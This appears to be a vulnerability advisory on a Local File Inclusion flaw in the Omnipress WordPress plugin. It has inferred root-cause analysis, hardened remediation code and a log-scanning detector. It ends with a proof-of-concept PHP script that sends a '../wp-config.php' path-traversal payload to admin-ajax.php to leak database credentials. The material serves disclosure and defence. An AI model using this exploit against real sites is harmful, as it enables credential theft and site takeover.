Atomic Edge analysis of CVE-2026-24538 (metadata-based):
The Omnipress plugin for WordPress, versions up to and including 1.6.7, contains an authenticated Local File Inclusion vulnerability. Attackers with contributor-level permissions or higher can exploit this flaw to include and execute arbitrary files on the server. This vulnerability directly impacts the plugin’s file handling component and has a high CVSS score of 7.5, indicating significant confidentiality, integrity, and availability impacts.
Atomic Edge research infers the root cause is improper validation of user-supplied input used in a PHP include or require statement. The CWE-98 classification confirms the plugin likely constructs a file path using attacker-controlled data without proper sanitization. This allows directory traversal sequences or absolute paths to be injected. The vulnerability description suggests the flaw may be reachable through an interface where users can upload or specify file names, such as an image or template management feature. These conclusions are inferred from the CWE and public description, as the source code is unavailable for direct confirmation.
Exploitation requires an authenticated session with at least contributor-level privileges. The attacker would likely send a crafted POST or GET request to a specific plugin endpoint, such as an AJAX handler or admin page. A probable attack vector is the `/wp-admin/admin-ajax.php` endpoint with an `action` parameter containing an Omnipress-specific hook. The malicious request would include a parameter, perhaps named `file` or `template`, containing a path traversal payload like `../../../wp-config.php` or a path to an uploaded file containing PHP code. This would cause the plugin to include and execute the specified file’s contents.
Remediation requires implementing strict validation and sanitization on any user input used for file operations. The fix must ensure user-supplied filenames are restricted to an allowlist or are stripped of directory traversal sequences. The plugin should also enforce that included files reside within a specific, intended directory, typically the plugin’s own directory. Implementing proper capability checks for the specific function and adding nonce verification would provide additional defense-in-depth layers.
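One way to implement the remediation described above, as an added example that is not Omnipress code: a WordPress AJAX handler that only includes an allowlisted template from a fixed plugin directory, after a capability check and a nonce check. The action name, the `template` parameter, the template directory and the allowlist are assumptions.

```php
<?php
// Added example (not Omnipress code): hardened AJAX handler for template loading.
// Assumptions: template directory, allowlist, capability and action/parameter names.

define('OP_TEMPLATE_DIR', __DIR__ . '/templates');        // assumed plugin template directory
const OP_ALLOWED_TEMPLATES = ['default', 'grid', 'list']; // assumed allowlist of template names

/**
 * Map a user-supplied template name to a file path, or return false.
 * Three independent checks: allowlist, safe character set, and realpath
 * confinement to $base_dir (defeats ../, absolute paths and symlink escapes).
 */
function op_resolve_template(string $name, string $base_dir, array $allowed) {
    if (!in_array($name, $allowed, true)) {
        return false;                                 // not on the allowlist
    }
    if (!preg_match('/^[a-z0-9_-]+$/', $name)) {
        return false;                                 // no separators, dots or NUL bytes
    }
    $base = realpath($base_dir);
    $path = realpath($base_dir . '/' . $name . '.php');
    if ($base === false || $path === false) {
        return false;                                 // base dir or template file missing
    }
    // The resolved path must sit strictly inside the base directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }
    return $path;
}

/** AJAX callback: capability check, nonce check, then the confined include. */
function op_ajax_render_template() {
    if (!current_user_can('edit_posts')) {            // assumed minimum capability for this feature
        wp_send_json_error('forbidden', 403);
    }
    check_ajax_referer('op_render_template', 'nonce'); // dies with 403 on a bad or missing nonce
    $name = isset($_POST['template']) ? sanitize_key(wp_unslash($_POST['template'])) : '';
    $path = op_resolve_template($name, OP_TEMPLATE_DIR, OP_ALLOWED_TEMPLATES);
    if ($path === false) {
        wp_send_json_error('invalid template', 400);
    }
    ob_start();
    include $path;                                    // only an allowlisted file under OP_TEMPLATE_DIR
    wp_send_json_success(ob_get_clean());
}
add_action('wp_ajax_op_render_template', 'op_ajax_render_template');
```

The allowlist alone closes the hole; the character filter and the realpath check are there so that a later change to the allowlist (for example, reading it from a settings page) cannot silently reopen it.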
Successful exploitation leads to full server-side code execution within the context of the WordPress application. Attackers can read sensitive files like `wp-config.php` to compromise database credentials. They can also write web shells to the filesystem if file write permissions exist, leading to persistent backdoor access. This vulnerability bypasses standard access controls, enabling privilege escalation and complete site takeover.
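For defenders looking for the request pattern described above in web-server logs, an added example (not part of the advisory): a scanner that flags `admin-ajax.php` requests whose `file` or `template` parameter carries a traversal sequence, an absolute path or a stream wrapper. The log lines are constructed samples and the parameter names follow the advisory's guess.

```php
<?php
// Added example (not from the advisory): scan access-log lines for admin-ajax.php
// requests with traversal-style values in suspect parameters. Sample lines are constructed.

const SUSPECT_PARAMS = ['file', 'template']; // parameter names guessed in the advisory

/** True if a parameter value looks like a traversal, absolute path or stream wrapper. */
function op_is_traversal(string $value): bool {
    // Decode twice to catch %2e%2e%2f and double-encoded %252e%252e%252f variants.
    $v = rawurldecode(rawurldecode($value));
    $v = str_replace('\\', '/', $v);
    if ($v === '') {
        return false;
    }
    return strpos($v, '../') !== false || strpos($v, "\0") !== false
        || $v[0] === '/' || preg_match('#^[a-z]:/#i', $v) === 1
        || preg_match('#^(php|data|phar|file)://#i', $v) === 1;
}

/** Return the log lines that hit admin-ajax.php with a suspect parameter value. */
function op_scan_log(array $lines): array {
    $hits = [];
    foreach ($lines as $line) {
        if (!preg_match('#"(?:GET|POST) /wp-admin/admin-ajax\.php(?:\?([^ "]*))? HTTP#', $line, $m)) {
            continue;
        }
        parse_str($m[1] ?? '', $params); // query string only: POST bodies are not in access logs
        foreach (SUSPECT_PARAMS as $p) {
            if (isset($params[$p]) && is_string($params[$p]) && op_is_traversal($params[$p])) {
                $hits[] = $line;
                break;
            }
        }
    }
    return $hits;
}

// Constructed sample lines (Apache combined format, abbreviated).
$sample = [
    '203.0.113.5 - - [01/Mar/2026:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=omnipress_action&file=grid HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Mar/2026:10:00:07 +0000] "GET /wp-admin/admin-ajax.php?action=omnipress_action&file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 2048',
    '198.51.100.9 - - [01/Mar/2026:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 9000',
];
foreach (op_scan_log($sample) as $hit) {
    echo "ALERT: $hit\n"; // prints only the second sample line
}
```

Because the advisory expects a POST request, access logs alone may miss the payload; pair this with a WAF or request-body log source, and treat any 200 response to such a request as a trigger to check `wp-config.php` credentials.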
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-24538 - Omnipress <= 1.6.7 - Authenticated (Contributor+) Local File Inclusion

/**
 * Proof of Concept for CVE-2026-24538.
 * ASSUMPTIONS: The vulnerable endpoint is an AJAX handler. The vulnerable parameter is named 'file'.
 * The AJAX action hook is derived from the plugin slug, 'omnipress'.
 * Contributor-level credentials are required.
 */
$target_url = 'https://target-site.com'; // CHANGE THIS
$username   = 'contributor_user';        // CHANGE THIS
$password   = 'contributor_pass';        // CHANGE THIS

// File to include via path traversal
$malicious_file = '../../../../wp-config.php';

// Step 1: Authenticate to WordPress and obtain cookies/nonce.
// This PoC assumes a standard WordPress login and uses the REST API to get a nonce.
$login_url = $target_url . '/wp-login.php';
$ajax_url  = $target_url . '/wp-admin/admin-ajax.php';

// Create a cURL handle for session persistence
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only

// Perform login via admin-ajax or wp-login (simplified example).
// In a real scenario, you would need to extract the login nonce from the form.
// This PoC skeleton shows the attack request structure post-authentication.

// Step 2: Craft the Local File Inclusion exploit request.
// The action is inferred as 'omnipress_action' or similar.
$post_fields = [
    'action' => 'omnipress_action', // INFERRED AJAX ACTION
    'file'   => $malicious_file,    // INFERRED VULNERABLE PARAMETER
    // Other required parameters (e.g., nonce) may be needed but are omitted for the PoC skeleton.
];
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));

$response  = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code == 200 && !empty($response)) {
    echo "Potential LFI successful. Response snippet:\n";
    echo substr($response, 0, 500) . "\n";
    // Check for signs of wp-config.php content in the response.
    if (strpos($response, 'DB_NAME') !== false) {
        echo "CONFIRMED: Sensitive configuration file leaked.\n";
    }
} else {
    echo "Exploit attempt failed or endpoint not vulnerable. HTTP Code: {$http_code}\n";
}
curl_close($ch);